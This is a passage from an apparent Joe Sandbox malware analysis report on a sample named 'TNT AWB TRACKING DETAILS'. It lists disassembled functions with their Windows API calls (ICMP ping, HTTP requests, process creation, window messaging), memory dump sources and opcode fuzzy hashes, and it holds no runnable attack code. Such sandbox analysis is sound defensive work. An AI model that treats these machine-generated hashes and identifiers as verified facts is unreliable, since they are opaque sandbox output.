                                                    • WSAStartup.WSOCK32(00000101,?), ref: 00F35793
                                                    • inet_addr.WSOCK32(?), ref: 00F357D8
                                                    • gethostbyname.WSOCK32(?), ref: 00F357E4
                                                    • IcmpCreateFile.IPHLPAPI ref: 00F357F2
                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F35862
                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F35878
                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F358ED
                                                    • WSACleanup.WSOCK32 ref: 00F358F3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                    • String ID: Ping
                                                    • API String ID: 1028309954-2246546115
                                                    • Opcode ID: 7d11838f0bcffb628684337fe422fbc84427cbbc731aa43311df0e966c7b480a
                                                    • Instruction ID: b8ad7ec6f2d3403bc963cac2702e65d5556374cc9fde036e353f02353c6cf7d1
                                                    • Opcode Fuzzy Hash: 7d11838f0bcffb628684337fe422fbc84427cbbc731aa43311df0e966c7b480a
                                                    • Instruction Fuzzy Hash: 2A516032604600DFD7109F25DD49B6AB7E4EF85B30F044929F95AEB2A1DB70E845EB41
                                                    Function 00F2B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 00F2B4D0
                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F2B546
                                                    • GetLastError.KERNEL32 ref: 00F2B550
                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 00F2B5BD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                    • API String ID: 4194297153-14809454
                                                    • Opcode ID: 126ae1f36cba41e2108a0741d3a1659008acb71c88de22814f41d5e53522a063
                                                    • Instruction ID: 03b93450ef5e6977e9eadeacf6251230587cf2b702e01f64c6f0439273f25163
                                                    • Opcode Fuzzy Hash: 126ae1f36cba41e2108a0741d3a1659008acb71c88de22814f41d5e53522a063
                                                    • Instruction Fuzzy Hash: 7031A235A00219DFCB00DB68D84AFAE77B4FF45310F18806AE905AB295DB719A46EB42
                                                    Function 00F18F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F19014
                                                    • GetDlgCtrlID.USER32 ref: 00F1901F
                                                    • GetParent.USER32 ref: 00F1903B
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F1903E
                                                    • GetDlgCtrlID.USER32(?), ref: 00F19047
                                                    • GetParent.USER32(?), ref: 00F19063
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F19066
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: c822aba509d4e02603e706136fbf421e6755d9f9a4f0ce1af924cebe26d9f708
                                                    • Instruction ID: 4eeb7f85c0107e6639458759d41e2df81a969a128845ff2dd0d15d51ed76f81c
                                                    • Opcode Fuzzy Hash: c822aba509d4e02603e706136fbf421e6755d9f9a4f0ce1af924cebe26d9f708
                                                    • Instruction Fuzzy Hash: 45212874A00208BBDF04EBB0CC95EFEBBB4EF5A310F100119F965972A1DB755859EB21
                                                    Function 00F1907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00EC7DE1: _memmove.LIBCMT ref: 00EC7E22
                                                      • Part of subcall function 00F1AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F1AABC
                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F190FD
                                                    • GetDlgCtrlID.USER32 ref: 00F19108
                                                    • GetParent.USER32 ref: 00F19124
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00F19127
                                                    • GetDlgCtrlID.USER32(?), ref: 00F19130
                                                    • GetParent.USER32(?), ref: 00F1914C
                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 00F1914F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 1536045017-1403004172
                                                    • Opcode ID: 14a09a199b21b60a4bbef244c50f631a8008434a695bfc0f254dde0b13e7107e
                                                    • Instruction ID: a5eb1916af7e9c7d02ed23e4779bc7004a7bbc89c72e24e3692726ae7982f76c
                                                    • Opcode Fuzzy Hash: 14a09a199b21b60a4bbef244c50f631a8008434a695bfc0f254dde0b13e7107e
                                                    • Instruction Fuzzy Hash: 6621FB75E01208BBDF00ABA0CC95FFEBBB4EF59300F104019F955A72A1DB755459EB21
                                                    Function 00F19163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetParent.USER32 ref: 00F1916F
                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 00F19184
                                                    • _wcscmp.LIBCMT ref: 00F19196
                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F19211
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                    • API String ID: 1704125052-3381328864
                                                    • Opcode ID: b0460de8196331d2f0bc2b012fdcb6a3c784bf7e8ab367a52c42fbe23272907b
                                                    • Instruction ID: 9012b162d2bb9ff4caf15221e74e13d38af16713b82e63e9273e7adadd72a911
                                                    • Opcode Fuzzy Hash: b0460de8196331d2f0bc2b012fdcb6a3c784bf7e8ab367a52c42fbe23272907b
                                                    • Instruction Fuzzy Hash: DF113A3B65C34BB9FA113A24DC1ADE737EC9B15330B200026FA04F10E1EEA2A89179D5
                                                    Function 00F388AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • VariantInit.OLEAUT32(?), ref: 00F388D7
                                                    • CoInitialize.OLE32(00000000), ref: 00F38904
                                                    • CoUninitialize.OLE32 ref: 00F3890E
                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 00F38A0E
                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 00F38B3B
                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F52C0C), ref: 00F38B6F
                                                    • CoGetObject.OLE32(?,00000000,00F52C0C,?), ref: 00F38B92
                                                    • SetErrorMode.KERNEL32(00000000), ref: 00F38BA5
                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F38C25
                                                    • VariantClear.OLEAUT32(?), ref: 00F38C35
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                    • String ID:
                                                    • API String ID: 2395222682-0
                                                    • Opcode ID: 49f3a065f4d5768fbae013861fdc9feec87f9b2dfe8cd2400360f7f7b82df4a3
                                                    • Instruction ID: 1f2eaacdc33cd010e7f5e2d09c8f6bb3f6311cbee9a5ca44ccf7f839dd732606
                                                    • Opcode Fuzzy Hash: 49f3a065f4d5768fbae013861fdc9feec87f9b2dfe8cd2400360f7f7b82df4a3
                                                    • Instruction Fuzzy Hash: 1FC157B1608305AFD700DF24C884A2BBBE9FF89798F00491DF9899B251DB75ED06DB52
                                                    Function 00F27990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F27A6C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ArraySafeVartype
                                                    • String ID:
                                                    • API String ID: 1725837607-0
                                                    • Opcode ID: ca38a5fde66138b99ac8211975788993d28b154f74a2ab9b4b44dd5b22485b40
                                                    • Instruction ID: f51e0396ba465c667bbdb50e24e6484f5d9f1a6c864bc8f3843feea9af18b0e8
                                                    • Opcode Fuzzy Hash: ca38a5fde66138b99ac8211975788993d28b154f74a2ab9b4b44dd5b22485b40
                                                    • Instruction Fuzzy Hash: 6EB1927590832A9FDB00EFA4E885BBEB7F4FF49321F144429E901E7251D734A941EB90
                                                    Function 00EFBDA2 Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 00EC2231
                                                    • SetTextColor.GDI32(?,000000FF), ref: 00EC223B
                                                    • SetBkMode.GDI32(?,00000001), ref: 00EC2250
                                                    • GetStockObject.GDI32(00000005), ref: 00EC2258
                                                    • GetClientRect.USER32(?), ref: 00EFBDBB
                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EFBDD2
                                                    • GetWindowDC.USER32(?), ref: 00EFBDDE
                                                    • GetPixel.GDI32(00000000,?,?), ref: 00EFBDED
                                                    • ReleaseDC.USER32(?,00000000), ref: 00EFBDFF
                                                    • GetSysColor.USER32(00000005), ref: 00EFBE1D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                    • String ID:
                                                    • API String ID: 3430376129-0
                                                    • Opcode ID: 3659c75f7a03cada3135761363e4060ae9a33ad66d3acea7441c6e91d1ab83e0
                                                    • Instruction ID: e14f4f09f22bd7855c31c586bf42d60549fba5f385c0e25376e41d2a926ff156
                                                    • Opcode Fuzzy Hash: 3659c75f7a03cada3135761363e4060ae9a33ad66d3acea7441c6e91d1ab83e0
                                                    • Instruction Fuzzy Hash: AC216A36500208EFDB216FA4ED08BE97B61EB6A325F114269FE29A50F1CB320955EF11
                                                    Function 00ECFA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00ECFAA6
                                                    • OleUninitialize.OLE32(?,00000000), ref: 00ECFB45
                                                    • UnregisterHotKey.USER32(?), ref: 00ECFC9C
                                                    • DestroyWindow.USER32(?), ref: 00F045D6
                                                    • FreeLibrary.KERNEL32(?), ref: 00F0463B
                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F04668
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                    • String ID: close all
                                                    • API String ID: 469580280-3243417748
                                                    • Opcode ID: 50da2b6e59bd1b73cb5cefc3cee1b679cee4ca2b5d9a5d0a09acf26d9d54d6e6
                                                    • Instruction ID: 83b1edaa26723e2b0ec0be13a1dd9cafcc617c3db77d2738912dd184484b6c8a
                                                    • Opcode Fuzzy Hash: 50da2b6e59bd1b73cb5cefc3cee1b679cee4ca2b5d9a5d0a09acf26d9d54d6e6
                                                    • Instruction Fuzzy Hash: 6BA17A717012168FCB18EF10CA94F69F3A1AF45710F1452ADE90AAB2A1DB32AD57EF50
                                                    Function 00F1A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • EnumChildWindows.USER32(?,00F1A439), ref: 00F1A377
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: ChildEnumWindows
                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                    • API String ID: 3555792229-1603158881
                                                    • Opcode ID: 26c1e5ae23001cdb6981b0859fae828f9c59d3a22806981e4856cd0f4045efe6
                                                    • Instruction ID: e94148a20f84d2267a6763f2986d1886560acd257af491932408c9265b971ef7
                                                    • Opcode Fuzzy Hash: 26c1e5ae23001cdb6981b0859fae828f9c59d3a22806981e4856cd0f4045efe6
                                                    • Instruction Fuzzy Hash: 0091C631A05649AADB08EFB0C442BEDFBB4BF04310F54912AD85DB7241DF3169DAEB91
                                                    Function 00EC2E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00EC2EAE
                                                      • Part of subcall function 00EC1DB3: GetClientRect.USER32(?,?), ref: 00EC1DDC
                                                      • Part of subcall function 00EC1DB3: GetWindowRect.USER32(?,?), ref: 00EC1E1D
                                                      • Part of subcall function 00EC1DB3: ScreenToClient.USER32(?,?), ref: 00EC1E45
                                                    • GetDC.USER32 ref: 00EFCD32
                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EFCD45
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EFCD53
                                                    • SelectObject.GDI32(00000000,00000000), ref: 00EFCD68
                                                    • ReleaseDC.USER32(?,00000000), ref: 00EFCD70
                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EFCDFB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                    • String ID: U
                                                    • API String ID: 4009187628-3372436214
                                                    • Opcode ID: 77deb77c8eb8967ad739828647a3d70bdf2bb406105cac12f1298a75594ede83
                                                    • Instruction ID: f92d7261ca4b604c2c35abe5a699776a988a0a8397d004694a3ceeb146ca2d15
                                                    • Opcode Fuzzy Hash: 77deb77c8eb8967ad739828647a3d70bdf2bb406105cac12f1298a75594ede83
                                                    • Instruction Fuzzy Hash: 9171B03550020DDFCF258F64CA80AFA7BB5FF49318F34526AEE557A266C7328841DB60
                                                    Function 00F31A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F31A50
                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F31A7C
                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F31ABE
                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F31AD3
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F31AE0
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F31B10
                                                    • InternetCloseHandle.WININET(00000000), ref: 00F31B57
                                                      • Part of subcall function 00F32483: GetLastError.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F32498
                                                      • Part of subcall function 00F32483: SetEvent.KERNEL32(?,?,00F31817,00000000,00000000,00000001), ref: 00F324AD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                    • String ID:
                                                    • API String ID: 2603140658-3916222277
                                                    • Opcode ID: 4f77d20d7f7a10c6d5799b5a4065418b79ff3d3ec0c02125f4e5812bae510325
                                                    • Instruction ID: 5c9d1b4e72cfa0ca3916743797de7840dad21dc180a995bf58ead1d7293cce76
                                                    • Opcode Fuzzy Hash: 4f77d20d7f7a10c6d5799b5a4065418b79ff3d3ec0c02125f4e5812bae510325
                                                    • Instruction Fuzzy Hash: 4F4182B5901219BFEB118F50CC85FBBBBACFF49364F004126FD059A141E7789E44ABA0
                                                    Function 00F38C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F4F910), ref: 00F38D28
                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F4F910), ref: 00F38D5C
                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F38ED6
                                                    • SysFreeString.OLEAUT32(?), ref: 00F38F00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                    • String ID:
                                                    • API String ID: 560350794-0
                                                    • Opcode ID: a87163907f5b32927c9505036fd9b0f6ea8d28ccb4b25297f15eadaf43c28543
                                                    • Instruction ID: 56f765c5163849af42dea5ceedaad09bd9edcd868981618110520fcfd335123b
                                                    • Opcode Fuzzy Hash: a87163907f5b32927c9505036fd9b0f6ea8d28ccb4b25297f15eadaf43c28543
                                                    • Instruction Fuzzy Hash: F4F14B71A00209EFDF04DFA4C888EAEB7B9FF45364F108498F905AB251DB75AE46DB50
                                                    Function 00F3F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _memset.LIBCMT ref: 00F3F6B5
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F848
                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F86C
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F8AC
                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F3F8CE
                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F3FA4A
                                                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F3FA7C
                                                    • CloseHandle.KERNEL32(?), ref: 00F3FAAB
                                                    • CloseHandle.KERNEL32(?), ref: 00F3FB22
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2136759059.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                    • Associated: 00000000.00000002.2136731973.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F4F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136847523.0000000000F74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136936253.0000000000F7E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2136964741.0000000000F87000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_ec0000_TNT AWB TRACKING DETAILS.jbxd
                                                    Similarity
